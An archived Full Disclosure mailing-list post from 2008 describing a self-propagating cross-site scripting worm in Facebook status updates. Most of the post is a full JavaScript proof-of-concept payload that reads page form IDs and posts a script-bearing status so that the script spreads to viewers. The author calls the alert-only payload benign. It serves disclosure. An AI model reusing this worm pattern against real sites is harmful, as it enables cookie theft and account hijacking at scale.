Full Disclosure mailing list archives
F4c3b00k Worm
From: "Kristian Erik Hermansen" <kristian.hermansen () gmail com>
Date: Thu, 25 Dec 2008 06:09:17 -0800
Seems to be able to spread via automated status messages. When another user sees the hijacked status message, they are likely to execute the status updater payload as well, which then spreads to anyone else who can see those status updates. This document.cookie payload is benign. Emulation is achieved by pasting the payload below into Firefox while on the profile.php page... javascript:var p='profile_id='+document.getElementById('profile_id').value+'&status=<script>alert(document.cookie);</script>'+'&profile=true'+'&test_name=INLINE_STATUS_EDITOR'+'&action=OTHER_UPDATE'+'&post_form_id='+document.getElementById('post_form_id').value;hr=new XMLHttpRequest();hr.overrideMimeType('text/html');hr.open('POST', 'updatestatus.php', true);hr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');hr.setRequestHeader('Content-length', p.length);hr.setRequestHeader('Connection', 'close');hr.send(p); -- Kristian Erik Hermansen Have you tried Session Destroyer yet? <http://kristian.hermansen.googlepages.com/session.destroyer.html> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- F4c3b00k Worm Kristian Erik Hermansen (Dec 25)